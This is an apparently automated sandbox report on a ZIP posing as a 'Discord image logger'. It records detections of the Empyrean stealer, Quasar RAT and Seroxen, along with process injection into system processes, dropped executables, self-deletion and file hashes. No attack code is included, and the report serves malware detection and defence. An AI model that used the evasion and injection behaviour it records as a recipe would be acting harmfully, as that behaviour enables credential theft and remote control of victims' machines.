Analysis Overview
SHA256
498e1a7d867df07ffa85a9f56e34faf43988b54cc84107e4696a9039fdb8c059
Threat Level: Known bad
The file discord-image-logger-release.zip was found to be: Known bad.
Malicious Activity Summary
Detects Empyrean stealer
Quasar RAT
Quasar family
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar payload
Empyrean family
Seroxen, Ser0xen
Seroxen family
Loads dropped DLL
Executes dropped EXE
Deletes itself
Checks computer location settings
Hide Artifacts: Hidden Window
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Runs ping.exe
Uses Task Scheduler COM API
Suspicious use of UnmapMainImage
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry class
Kills process with taskkill
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-24 04:13
Signatures
Detects Empyrean stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Empyrean family
Analysis: behavioral6
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
93s
Max time network
141s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20241010-en
Max time kernel
103s
Max time network
19s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2736 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2736 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2736 wrote to memory of 3008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 3008 wrote to memory of 2976 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3008 wrote to memory of 2976 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3008 wrote to memory of 2976 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3008 wrote to memory of 2976 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 3b8a103a8bf8810e346989e96537142a |
| SHA1 | f15ac8d08fa08e5596962bab287f9ada3dbfdb0d |
| SHA256 | d1ef060e5f85038ec3bf233b808d4f19bbd7b89004fbfe8a64e1793e6bd1c548 |
| SHA512 | d77980ef603e8818e2e81da90848f4187e9933931cb37859f1645f6c15c521e2460b5156d200ee7a098e1b454cd174918d873f2a1190f67ef8001537408d703c |
Analysis: behavioral13
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20241010-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2028 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2028 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2028 wrote to memory of 1672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1672 wrote to memory of 2720 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1672 wrote to memory of 2720 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1672 wrote to memory of 2720 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 1672 wrote to memory of 2720 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 7e4934fe584f8af05769ea82f26c2c8d |
| SHA1 | b6c8ce236ebacbb2201f95422baefe8da7da621d |
| SHA256 | b0f39c04a8a3beadadd9b1aeb763bde1a90516196bfe0d596e9b6bda48e6d7a7 |
| SHA512 | 238883eccd6ce5ba67f0f5ad7229ec615f5d7ca8fd65f9b7c8f9cc33401fda72c4327d009f6a613f5bd1b093ba32105a9a3a79b40b25c662768db72828ade200 |
Analysis: behavioral11
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20250207-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2720 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2720 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2720 wrote to memory of 2912 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2912 wrote to memory of 2820 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2912 wrote to memory of 2820 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2912 wrote to memory of 2820 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2912 wrote to memory of 2820 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 5655cfbf488c9ed93c1c92c6887cad13 |
| SHA1 | c58ece13cee5553e55327b933b6b9cd1724309ad |
| SHA256 | 53b27f2aac3577c72b1cedec39c609d10f8d986d4504a29bfa93a8c4ae2cf1f5 |
| SHA512 | 20c91d105131e254e1b4719c2bcadd1cc4b224aebe3327fb11d70b0323d126ec0f95633bb3bba36886f23b3fe11b6d943b30304f0de403e9a36205b139d6ba1b |
Analysis: behavioral15
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2704 wrote to memory of 2724 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2704 wrote to memory of 2724 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2704 wrote to memory of 2724 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2724 wrote to memory of 2612 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2724 wrote to memory of 2612 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2724 wrote to memory of 2612 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2724 wrote to memory of 2612 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 58dd7604b30aa1e947b8793b401ed49e |
| SHA1 | 7fde10807d7ded3107c2f356bbcc28b796637d5e |
| SHA256 | ba14d03360c1cd20d2fdfb82a7f1474ad293dbbd0b96f6887d9f231dc0fef1a9 |
| SHA512 | bd1833245f787985bfc9adf3b66c15f8a4752dc5409852a12e93e21a5b7b9fb29da8ccfda3b9827d6229c9f4fd10cc5f37f63e26cea0165cfa1598c9cc7db566 |
Analysis: behavioral18
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | udp | |
| GB | 104.78.173.167:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Seroxen family
Seroxen, Ser0xen
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4252 created 588 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 4128 created 588 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\system32\winlogon.exe |
| PID 4128 created 588 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\system32\winlogon.exe |
| PID 4252 created 588 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 4252 created 588 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\system32\winlogon.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\System32\vcruntime140_1d.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File created | C:\Windows\System32\vcruntime140d.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\ucrtbased.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\vcruntime140d.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\ucrtbased.dll | C:\Windows\$sxr-powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\ucrtbased.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | C:\Windows\$sxr-powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\vcruntime140d.dll | C:\Windows\$sxr-powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4252 set thread context of 5108 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 4128 set thread context of 2716 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 4128 set thread context of 3728 | N/A | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\dllhost.exe |
| PID 4252 set thread context of 212 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 4252 set thread context of 4660 | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| File created | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1740370487" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 24 Feb 2025 04:14:48 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={6E75927A-EA84-4F8F-95FC-2A90EA306FF6}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
